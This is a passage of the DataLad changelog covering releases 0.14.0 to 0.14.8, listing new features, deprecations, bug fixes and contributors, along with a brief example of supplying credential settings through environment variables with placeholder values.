installations.\n (`#5803 <https://github.com/datalad/datalad/issues/5803>`__)\n\n - ``push`` reports when a ``--to`` parameter specification was\n (likely) forgotten.\n (`#5726 <https://github.com/datalad/datalad/issues/5726>`__)\n\n - Detailed information is now given when DataLad fails to obtain a\n lock for credential entry in a timely fashion. Previously only a\n generic debug log message was emitted.\n (`#5884 <https://github.com/datalad/datalad/issues/5884>`__)\n\n - Clarified error message when ``create-sibling-gitlab`` was called\n without ``--project``.\n (`#5907 <https://github.com/datalad/datalad/issues/5907>`__)\n\n- ``add-readme`` now provides a README template with more information\n on the nature and use of DataLad datasets. A README file is no longer\n annex’ed by default, but can be annex’ed using the new ``--annex``\n switch.\n (`#5723 <https://github.com/datalad/datalad/issues/5723>`__,\n `#5725 <https://github.com/datalad/datalad/issues/5725>`__)\n\n- ``clean`` now supports a ``--dry-run`` mode to inform about cleanable\n content. (`#5738 <https://github.com/datalad/datalad/issues/5738>`__)\n\n- A new configuration setting ``datalad.locations.locks`` can be used\n to control the placement of lock files.\n (`#5740 <https://github.com/datalad/datalad/issues/5740>`__)\n\n- ``wtf`` now also reports branch names and states.\n (`#5804 <https://github.com/datalad/datalad/issues/5804>`__)\n\n- ``AnnexRepo.whereis()`` now supports batch mode.\n (`#5533 <https://github.com/datalad/datalad/issues/5533>`__)\n\n
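The credential entry above describes a purely configuration-based way to\nprovide credentials. As a rough, illustrative sketch (the credential name\n``mycred`` and its field names are invented for this example, and actual\nfield names depend on the credential type), such values could be supplied\nvia environment variables that follow the documented mapping of\n``datalad.*`` configuration options onto ``DATALAD_*`` variables, where a\nhyphen in an option name corresponds to a double underscore::\n\n  import os\n\n  # Hypothetical credential "mycred": datalad.credential.mycred.user\n  # corresponds to DATALAD_CREDENTIAL_MYCRED_USER, and so on.\n  os.environ["DATALAD_CREDENTIAL_MYCRED_USER"] = "alice"\n  os.environ["DATALAD_CREDENTIAL_MYCRED_SECRET"] = "not-a-real-secret"\n\n  # Illustrative use of the force-ask flag described above\n  # (datalad.credentials.force-ask -> DATALAD_CREDENTIALS_FORCE__ASK).\n  os.environ["DATALAD_CREDENTIALS_FORCE__ASK"] = "1"\n\n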
.. _deprecations-and-removals-2:\n\nDeprecations and removals\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- The minimum supported git-annex version is now 8.20200309.\n (`#5512 <https://github.com/datalad/datalad/issues/5512>`__)\n\n- ORA special remote configuration items ``ssh-host``, and\n ``base-path`` are deprecated. They are completely replaced by\n ``ria+<protocol>://`` URL specifications.\n (`#5425 <https://github.com/datalad/datalad/issues/5425>`__)\n\n- The deprecated ``no_annex`` parameter of ``create()`` was removed\n from the Python API.\n (`#5441 <https://github.com/datalad/datalad/issues/5441>`__)\n\n- The unused ``GitRepo.pull()`` method has been removed.\n (`#5558 <https://github.com/datalad/datalad/issues/5558>`__)\n\n- Residual support for “plugins” (a mechanism used before DataLad\n supported extensions) was removed. This includes the configuration\n switches ``datalad.locations.{system,user}-plugins``.\n (`#5554 <https://github.com/datalad/datalad/issues/5554>`__,\n `#5564 <https://github.com/datalad/datalad/issues/5564>`__)\n\n- Several features and commands have been moved to the\n ``datalad-deprecated`` package. This package must now be installed to\n keep using this functionality.\n\n - The ``publish`` command. Use ``push`` instead.\n (`#5837 <https://github.com/datalad/datalad/issues/5837>`__)\n\n - The ``ls`` command.\n (`#5569 <https://github.com/datalad/datalad/issues/5569>`__)\n\n - The web UI that is deployable via ``datalad create-sibling --ui``.\n (`#5555 <https://github.com/datalad/datalad/issues/5555>`__)\n\n - The “automagic IO” feature.\n (`#5577 <https://github.com/datalad/datalad/issues/5577>`__)\n\n- ``AnnexRepo.copy_to()`` has been deprecated. The ``push`` command\n should be used instead.\n (`#5560 <https://github.com/datalad/datalad/issues/5560>`__)\n\n- ``AnnexRepo.sync()`` has been deprecated.\n ``AnnexRepo.call_annex(['sync', ...])`` should be used instead.\n (`#5461 <https://github.com/datalad/datalad/issues/5461>`__)\n\n- All ``GitRepo.*_submodule()`` methods have been deprecated and will\n be removed in a future release.\n (`#5559 <https://github.com/datalad/datalad/issues/5559>`__)\n\n- ``create-sibling-github``\\ ’s ``--dryrun`` switch was deprecated, use\n ``--dry-run`` instead.\n (`#5551 <https://github.com/datalad/datalad/issues/5551>`__)\n\n- The ``datalad --pbs-runner`` option has been deprecated, use\n ``condor_run`` (or similar) instead.\n (`#5956 <https://github.com/datalad/datalad/issues/5956>`__)\n\nFixes\n-----\n\n- Prevent invalid declaration of a publication dependency for\n ‘origin’ on any auto-detected ORA special remotes, when cloning from a\n RIA store. 
An ORA remote is now checked whether it actually points to\n the RIA store the clone was made from.\n (`#5415 <https://github.com/datalad/datalad/issues/5415>`__)\n\n- The ORA special remote implementation has received several fixes:\n\n - It can now handle HTTP redirects.\n (`#5792 <https://github.com/datalad/datalad/issues/5792>`__)\n\n - Prevents failure when URL-type annex keys contain the ‘/’\n character.\n (`#5823 <https://github.com/datalad/datalad/issues/5823>`__)\n\n - Properly support the specification of usernames, passwords and\n ports in ``ria+<protocol>://`` URLs.\n (`#5902 <https://github.com/datalad/datalad/issues/5902>`__)\n\n- It is now possible to specifically select the default (or generic)\n result renderer via ``datalad -f default`` and with that override a\n ``tailored`` result renderer that may be preconfigured for a\n particular command.\n (`#5476 <https://github.com/datalad/datalad/issues/5476>`__)\n\n- Starting with 0.14.0, original URLs given to ``clone`` were recorded\n in a subdataset record. This was initially done in a second commit,\n leading to inflation of commits and slowdown in superdatasets with\n many subdatasets. Such subdataset record annotation is now collapsed\n into a single commit.\n (`#5480 <https://github.com/datalad/datalad/issues/5480>`__)\n\n- ``run`` no longer removes leading empty directories as part of the\n output preparation. This was surprising behavior for commands that do\n not ensure on their own that output directories exist.\n (`#5492 <https://github.com/datalad/datalad/issues/5492>`__)\n\n- A potentially existing ``message`` property is no longer removed when\n using the ``json`` or ``json_pp`` result renderer to avoid undesired\n withholding of relevant information.\n (`#5536 <https://github.com/datalad/datalad/issues/5536>`__)\n\n- ``subdatasets`` now reports ``state=present``, rather than\n ``state=clean``, for installed subdatasets to complement\n ``state=absent`` reports for uninstalled datasets.\n (`#5655 <https://github.com/datalad/datalad/issues/5655>`__)\n\n- ``create-sibling-ria`` now executes commands with a consistent\n environment setup that matches all other command execution in other\n DataLad commands.\n (`#5682 <https://github.com/datalad/datalad/issues/5682>`__)\n\n- ``save`` no longer saves unspecified subdatasets when called with an\n explicit path (list). The fix required a behavior change of\n ``GitRepo.get_content_info()`` in its interpretation of ``None``\n vs. ``[]`` path argument values that now aligns the behavior of\n ``GitRepo.diff|status()`` with their respective documentation.\n (`#5693 <https://github.com/datalad/datalad/issues/5693>`__)\n\n- ``get`` now prefers the location of a subdataset that is recorded in\n a superdataset’s ``.gitmodules`` record. Previously, DataLad tried to\n obtain a subdataset from an assumed checkout of the superdataset’s\n origin. This new default order is (re-)configurable via the\n ``datalad.get.subdataset-source-candidate-<priority-label>``\n configuration mechanism.\n (`#5760 <https://github.com/datalad/datalad/issues/5760>`__)\n\n- ``create-sibling-gitlab`` no longer skips the root dataset when ``.``\n is given as a path.\n (`#5789 <https://github.com/datalad/datalad/issues/5789>`__)\n\n- ``siblings`` now rejects a value given to ``--as-common-datasrc``\n that clashes with the respective Git remote.\n (`#5805 <https://github.com/datalad/datalad/issues/5805>`__)\n\n- The usage synopsis reported by ``siblings`` now lists all supported\n actions. 
(`#5913 <https://github.com/datalad/datalad/issues/5913>`__)\n\n- ``siblings`` now renders non-ok results to avoid silent failure.\n (`#5915 <https://github.com/datalad/datalad/issues/5915>`__)\n\n- ``.gitattribute`` file manipulations no longer leave the file without\n a trailing newline.\n (`#5847 <https://github.com/datalad/datalad/issues/5847>`__)\n\n- Prevent crash when trying to delete a non-existing keyring credential\n field. (`#5892 <https://github.com/datalad/datalad/issues/5892>`__)\n\n- git-annex is no longer called with an unconditional ``annex.retry=3``\n configuration. Instead, this parameterization is now limited to\n ``annex get`` and ``annex copy`` calls.\n (`#5904 <https://github.com/datalad/datalad/issues/5904>`__)\n\n.. _tests-19:\n\nTests\n-----\n\n- ``file://`` URLs are no longer the predominant test case for\n ``AnnexRepo`` functionality. A built-in HTTP server now used in most\n cases. (`#5332 <https://github.com/datalad/datalad/issues/5332>`__)\n\n--------------\n\n0.14.8 (Sun Sep 12 2021)\n========================\n\n.. _bug-fix-17:\n\nBug Fix\n-------\n\n- BF: add-archive-content on .xz and other non-.gz stream compressed\n files `#5930 <https://github.com/datalad/datalad/pull/5930>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(UX): do not keep logging ERROR possibly present in progress\n records `#5936 <https://github.com/datalad/datalad/pull/5936>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Annotate datalad_core as not needing actual data – just uses annex\n whereis `#5971 <https://github.com/datalad/datalad/pull/5971>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: limit CMD_MAX_ARG if obnoxious value is encountered.\n `#5945 <https://github.com/datalad/datalad/pull/5945>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Download session/credentials locking – inform user if locking is\n “failing” to be obtained, fail upon ~5min timeout\n `#5884 <https://github.com/datalad/datalad/pull/5884>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Render siblings()’s non-ok results with the default renderer\n `#5915 <https://github.com/datalad/datalad/pull/5915>`__\n (`@mih <https://github.com/mih>`__)\n- BF: do not crash, just skip whenever trying to delete non existing\n field in the underlying keyring\n `#5892 <https://github.com/datalad/datalad/pull/5892>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Fix argument-spec for ``siblings`` and improve usage synopsis\n `#5913 <https://github.com/datalad/datalad/pull/5913>`__\n (`@mih <https://github.com/mih>`__)\n- Clarify error message re unspecified gitlab project\n `#5907 <https://github.com/datalad/datalad/pull/5907>`__\n (`@mih <https://github.com/mih>`__)\n- Support username, password and port specification in RIA URLs\n `#5902 <https://github.com/datalad/datalad/pull/5902>`__\n (`@mih <https://github.com/mih>`__)\n- BF: take path from SSHRI, test URLs not only on Windows\n `#5881 <https://github.com/datalad/datalad/pull/5881>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(UX): warn user if keyring returned a “null” keyring\n `#5875 <https://github.com/datalad/datalad/pull/5875>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(UX): state original purpose in NoDatasetFound exception + detail\n it for get `#5708 <https://github.com/datalad/datalad/pull/5708>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. 
_pushed-to-maint-5:\n\nPushed to ``maint``\n-------------------\n\n- Merge branch ‘bf-http-headers-agent’ into maint\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF(BF?)+DOC: provide User-Agent to entire session headers + use those\n if provided (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-15:\n\nInternal\n--------\n\n- Pass ``--no-changelog`` to ``auto shipit`` if changelog already has\n entry `#5952 <https://github.com/datalad/datalad/pull/5952>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Add isort config to match current convention + run isort via\n pre-commit (if configured)\n `#5923 <https://github.com/datalad/datalad/pull/5923>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- .travis.yml: use python -m {nose,coverage} invocations, and always\n show combined report\n `#5888 <https://github.com/datalad/datalad/pull/5888>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Add project URLs into the package metadata for convenience links on\n Pypi `#5866 <https://github.com/datalad/datalad/pull/5866>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-20:\n\nTests\n-----\n\n- BF: do use OBSCURE_FILENAME instead of hardcoded unicode\n `#5944 <https://github.com/datalad/datalad/pull/5944>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): Skip testing for having PID listed if no psutil\n `#5920 <https://github.com/datalad/datalad/pull/5920>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): Boost version of git-annex to 8.20201129 to test an error\n message `#5894 <https://github.com/datalad/datalad/pull/5894>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-4-1:\n\nAuthors: 4\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.7 (Tue Aug 03 2021)\n========================\n\n.. 
_bug-fix-18:\n\nBug Fix\n-------\n\n- UX: When two or more clone URL templates are found, error out more\n gracefully `#5839 <https://github.com/datalad/datalad/pull/5839>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: http_auth - follow redirect (just 1) to re-authenticate after\n initial attempt\n `#5852 <https://github.com/datalad/datalad/pull/5852>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- addurls Formatter - provide value repr in exception\n `#5850 <https://github.com/datalad/datalad/pull/5850>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: allow for “patch” level semver for “master” branch\n `#5839 <https://github.com/datalad/datalad/pull/5839>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: Report info from annex JSON error message in CommandError\n `#5809 <https://github.com/datalad/datalad/pull/5809>`__\n (`@mih <https://github.com/mih>`__)\n- RF(TST): do not test for no EASY and pkg_resources in shims\n `#5817 <https://github.com/datalad/datalad/pull/5817>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- http downloaders: Provide custom informative User-Agent, do not claim\n to be “Authenticated access”\n `#5802 <https://github.com/datalad/datalad/pull/5802>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(UX,DX): inform user with a warning if version is 0+unknown\n `#5787 <https://github.com/datalad/datalad/pull/5787>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- shell-completion: add argcomplete to ‘misc’ extra_depends, log an\n ERROR if argcomplete fails to import\n `#5781 <https://github.com/datalad/datalad/pull/5781>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH (UX): add python-gitlab dependency\n `#5776 <https://github.com/datalad/datalad/pull/5776>`__\n ([email protected])\n\n.. _internal-16:\n\nInternal\n--------\n\n- BF: Fix reported paths in ORA remote\n `#5821 <https://github.com/datalad/datalad/pull/5821>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: import importlib.metadata not importlib_metadata whenever\n available `#5818 <https://github.com/datalad/datalad/pull/5818>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-21:\n\nTests\n-----\n\n- TST: set –allow-unrelated-histories in the mk_push_target setup for\n Windows `#5855 <https://github.com/datalad/datalad/pull/5855>`__\n (`@adswa <https://github.com/adswa>`__)\n- Tests: Allow for version to contain + as a separator and provide more\n information for version related comparisons\n `#5786 <https://github.com/datalad/datalad/pull/5786>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-4-2:\n\nAuthors: 4\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Stephan Heunis (`@jsheunis <https://github.com/jsheunis>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.6 (Sun Jun 27 2021)\n========================\n\n.. _internal-17:\n\nInternal\n--------\n\n- BF: update changelog conversion from .md to .rst (for sphinx)\n `#5757 <https://github.com/datalad/datalad/pull/5757>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _authors-2-1:\n\nAuthors: 2\n----------\n\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.5 (Mon Jun 21 2021)\n========================\n\n.. 
_bug-fix-19:\n\nBug Fix\n-------\n\n- BF(TST): parallel - take longer for producer to produce\n `#5747 <https://github.com/datalad/datalad/pull/5747>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- add –on-failure default value and document it\n `#5690 <https://github.com/datalad/datalad/pull/5690>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: harmonize “purpose” statements to imperative form\n `#5733 <https://github.com/datalad/datalad/pull/5733>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(TST): populate heavy tree with 100 unique keys (not just 1) among\n 10,000 `#5734 <https://github.com/datalad/datalad/pull/5734>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: do not use .acquired - just get state from acquire()\n `#5718 <https://github.com/datalad/datalad/pull/5718>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: account for annex now “scanning for annexed” instead of\n “unlocked” files\n `#5705 <https://github.com/datalad/datalad/pull/5705>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- interface: Don’t repeat custom summary for non-generator results\n `#5688 <https://github.com/datalad/datalad/pull/5688>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: just pip install datalad-installer\n `#5676 <https://github.com/datalad/datalad/pull/5676>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: addurls.extract: Drop mention of removed ‘stream’ parameter\n `#5690 <https://github.com/datalad/datalad/pull/5690>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5674 from kyleam/test-addurls-copy-fix\n `#5674 <https://github.com/datalad/datalad/pull/5674>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5663 from kyleam/status-ds-equal-path\n `#5663 <https://github.com/datalad/datalad/pull/5663>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5671 from kyleam/update-fetch-fail\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- BF: update: Honor –on-failure if fetch fails\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: update: Avoid fetch’s deprecated kwargs\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- CLN: update: Drop an unused import\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5664 from kyleam/addurls-better-url-parts-error\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5661 from kyleam/sphinx-fix-plugin-refs\n `#5661 <https://github.com/datalad/datalad/pull/5661>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- BF: status: Provide special treatment of “this dataset” path\n `#5663 <https://github.com/datalad/datalad/pull/5663>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- BF: addurls: Provide better placeholder error for special keys\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: addurls: Simply construction of placeholder exception message\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: addurls._get_placeholder_exception: Rename a parameter\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n 
(`@kyleam <https://github.com/kyleam>`__)\n- RF: status: Avoid repeated Dataset.path access\n `#5663 <https://github.com/datalad/datalad/pull/5663>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- DOC: Reference plugins via datalad.api\n `#5661 <https://github.com/datalad/datalad/pull/5661>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- download-url: Set up datalad special remote if needed\n `#5648 <https://github.com/datalad/datalad/pull/5648>`__\n (`@kyleam <https://github.com/kyleam>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _pushed-to-maint-6:\n\nPushed to ``maint``\n-------------------\n\n- MNT: Post-release dance (`@kyleam <https://github.com/kyleam>`__)\n\n.. _internal-18:\n\nInternal\n--------\n\n- Switch to versioneer and auto\n `#5669 <https://github.com/datalad/datalad/pull/5669>`__\n (`@jwodder <https://github.com/jwodder>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- MNT: setup.py: Temporarily avoid Sphinx 4\n `#5649 <https://github.com/datalad/datalad/pull/5649>`__\n (`@kyleam <https://github.com/kyleam>`__)\n\n.. _tests-22:\n\nTests\n-----\n\n- BF(TST): skip testing for showing “Scanning for …” since not shown if\n too quick `#5727 <https://github.com/datalad/datalad/pull/5727>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Revert “TST: test_partial_unlocked: Document and avoid recent\n git-annex failure”\n `#5651 <https://github.com/datalad/datalad/pull/5651>`__\n (`@kyleam <https://github.com/kyleam>`__)\n\n.. _authors-4-3:\n\nAuthors: 4\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Kyle Meyer (`@kyleam <https://github.com/kyleam>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.4 (May 10, 2021) – .\n=========================\n\n.. _fixes-1:\n\nFixes\n-----\n\n- Following an internal call to ``git-clone``,\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n assumed that the remote name was “origin”, but this may not be the\n case if ``clone.defaultRemoteName`` is configured (available as of\n Git 2.30).\n (`#5572 <https://github.com/datalad/datalad/issues/5572>`__)\n\n- Several test fixes, including updates for changes in git-annex.\n (`#5612 <https://github.com/datalad/datalad/issues/5612>`__)\n (`#5632 <https://github.com/datalad/datalad/issues/5632>`__)\n (`#5639 <https://github.com/datalad/datalad/issues/5639>`__)\n\n0.14.3 (April 28, 2021) – .\n===========================\n\n.. _fixes-2:\n\nFixes\n-----\n\n- For outputs that include a glob,\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n didn’t re-glob after executing the command, which is necessary to\n catch changes if ``--explicit`` or ``--expand={outputs,both}`` is\n specified.\n (`#5594 <https://github.com/datalad/datalad/issues/5594>`__)\n\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n now gives an error result rather than a warning when an input glob\n doesn’t match.\n (`#5594 <https://github.com/datalad/datalad/issues/5594>`__)\n\n- The procedure for creating a RIA store checks for an existing\n ria-layout-version file and makes sure its version matches the\n desired version. 
This check wasn’t done correctly for SSH hosts.\n (`#5607 <https://github.com/datalad/datalad/issues/5607>`__)\n\n- A helper for transforming git-annex JSON records into DataLad results\n didn’t account for the unusual case where the git-annex record\n doesn’t have a “file” key.\n (`#5580 <https://github.com/datalad/datalad/issues/5580>`__)\n\n- The test suite required updates for recent changes in PyGithub and\n git-annex.\n (`#5603 <https://github.com/datalad/datalad/issues/5603>`__)\n (`#5609 <https://github.com/datalad/datalad/issues/5609>`__)\n\n.. _enhancements-and-new-features-6:\n\nEnhancements and new features\n-----------------------------\n\n- The DataLad source repository has long had a tools/cmdline-completion\n helper. This functionality is now exposed as a command,\n ``datalad shell-completion``.\n (`#5544 <https://github.com/datalad/datalad/issues/5544>`__)\n\n0.14.2 (April 14, 2021) – .\n===========================\n\n.. _fixes-3:\n\nFixes\n-----\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n now works bottom-up, pushing submodules first so that hooks on the\n remote can aggregate updated subdataset information.\n (`#5416 <https://github.com/datalad/datalad/issues/5416>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n didn’t ensure that the configuration of subdatasets was reloaded.\n (`#5552 <https://github.com/datalad/datalad/issues/5552>`__)\n\n0.14.1 (April 01, 2021) – .\n===========================\n\n.. _fixes-4:\n\nFixes\n-----\n\n- The recent default branch changes on GitHub’s side can lead to\n “git-annex” being selected over “master” as the default branch on\n GitHub when setting up a sibling with\n `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__.\n To work around this, the current branch is now pushed first.\n (`#5010 <https://github.com/datalad/datalad/issues/5010>`__)\n\n- The logic for reading in a JSON line from git-annex failed if the\n response exceeded the buffer size (256 KB on \\*nix systems).\n\n- Calling\n `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n with a path of “.” from within an untracked subdataset incorrectly\n aborted, complaining that the “dataset containing given paths is not\n underneath the reference dataset”.\n (`#5458 <https://github.com/datalad/datalad/issues/5458>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n didn’t account for the possibility of multiple accessible ORA remotes\n or the fact that none of them may be associated with the RIA store\n being cloned.\n (`#5488 <https://github.com/datalad/datalad/issues/5488>`__)\n\n- `create-sibling-ria <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html>`__\n didn’t call ``git update-server-info`` after setting up the remote\n repository and, as a result, the repository couldn’t be fetched until\n something else (e.g., a push) triggered a call to\n ``git update-server-info``.\n (`#5531 <https://github.com/datalad/datalad/issues/5531>`__)\n\n- The parser for git-config output didn’t properly handle multi-line\n values and got thrown off by unexpected and unrelated lines.\n (`#5509 <https://github.com/datalad/datalad/issues/5509>`__)\n\n- The 0.14 release introduced regressions in the handling of progress\n bars for git-annex actions, including collapsing progress bars for\n concurrent 
operations.\n (`#5421 <https://github.com/datalad/datalad/issues/5421>`__)\n (`#5438 <https://github.com/datalad/datalad/issues/5438>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n failed if the user configured Git’s ``diff.ignoreSubmodules`` to a\n non-default value.\n (`#5453 <https://github.com/datalad/datalad/issues/5453>`__)\n\n- A interprocess lock is now used to prevent a race between checking\n for an SSH socket’s existence and creating it.\n (`#5466 <https://github.com/datalad/datalad/issues/5466>`__)\n\n- If a Python procedure script is executable,\n `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n invokes it directly rather than passing it to ``sys.executable``. The\n non-executable Python procedures that ship with DataLad now include\n shebangs so that invoking them has a chance of working on file\n systems that present all files as executable.\n (`#5436 <https://github.com/datalad/datalad/issues/5436>`__)\n\n- DataLad’s wrapper around ``argparse`` failed if an underscore was\n used in a positional argument.\n (`#5525 <https://github.com/datalad/datalad/issues/5525>`__)\n\n.. _enhancements-and-new-features-7:\n\nEnhancements and new features\n-----------------------------\n\n- DataLad’s method for mapping environment variables to configuration\n options (e.g., ``DATALAD_FOO_X__Y`` to ``datalad.foo.x-y``) doesn’t\n work if the subsection name (“FOO”) has an underscore. This\n limitation can be sidestepped with the new\n ``DATALAD_CONFIG_OVERRIDES_JSON`` environment variable, which can be\n set to a JSON record of configuration values.\n (`#5505 <https://github.com/datalad/datalad/issues/5505>`__)\n\n0.14.0 (February 02, 2021) – .\n==============================\n\nMajor refactoring and deprecations\n----------------------------------\n\n- Git versions below v2.19.1 are no longer supported.\n (`#4650 <https://github.com/datalad/datalad/issues/4650>`__)\n\n- The minimum git-annex version is still 7.20190503, but, if you’re on\n Windows (or use adjusted branches in general), please upgrade to at\n least 8.20200330 but ideally 8.20210127 to get subdataset-related\n fixes. (`#4292 <https://github.com/datalad/datalad/issues/4292>`__)\n (`#5290 <https://github.com/datalad/datalad/issues/5290>`__)\n\n- The minimum supported version of Python is now 3.6.\n (`#4879 <https://github.com/datalad/datalad/issues/4879>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n is now deprecated in favor of\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__.\n It will be removed in the 0.15.0 release at the earliest.\n\n- A new command runner was added in v0.13. Functionality related to the\n old runner has now been removed: ``Runner``, ``GitRunner``, and\n ``run_gitcommand_on_file_list_chunks`` from the ``datalad.cmd``\n module along with the ``datalad.tests.protocolremote``,\n ``datalad.cmd.protocol``, and ``datalad.cmd.protocol.prefix``\n configuration options.\n (`#5229 <https://github.com/datalad/datalad/issues/5229>`__)\n\n- The ``--no-storage-sibling`` switch of ``create-sibling-ria`` is\n deprecated in favor of ``--storage-sibling=off`` and will be removed\n in a later release.\n (`#5090 <https://github.com/datalad/datalad/issues/5090>`__)\n\n- The ``get_git_dir`` static method of ``GitRepo`` is deprecated and\n will be removed in a later release. 
Use the ``dot_git`` attribute of\n an instance instead.\n (`#4597 <https://github.com/datalad/datalad/issues/4597>`__)\n\n- The ``ProcessAnnexProgressIndicators`` helper from\n ``datalad.support.annexrepo`` has been removed.\n (`#5259 <https://github.com/datalad/datalad/issues/5259>`__)\n\n- The ``save`` argument of\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__,\n a noop since v0.6.0, has been dropped.\n (`#5278 <https://github.com/datalad/datalad/issues/5278>`__)\n\n- The ``get_URLS`` method of ``AnnexCustomRemote`` is deprecated and\n will be removed in a later release.\n (`#4955 <https://github.com/datalad/datalad/issues/4955>`__)\n\n- ``ConfigManager.get`` now returns a single value rather than a tuple\n when there are multiple values for the same key, as very few callers\n correctly accounted for the possibility of a tuple return value.\n Callers can restore the old behavior by passing ``get_all=True``.\n (`#4924 <https://github.com/datalad/datalad/issues/4924>`__)\n\n- In 0.12.0, all of the ``assure_*`` functions in ``datalad.utils``\n were renamed as ``ensure_*``, keeping the old names around as\n compatibility aliases. The ``assure_*`` variants are now marked as\n deprecated and will be removed in a later release.\n (`#4908 <https://github.com/datalad/datalad/issues/4908>`__)\n\n- The ``datalad.interface.run`` module, which was deprecated in 0.12.0\n and kept as a compatibility shim for ``datalad.core.local.run``, has\n been removed.\n 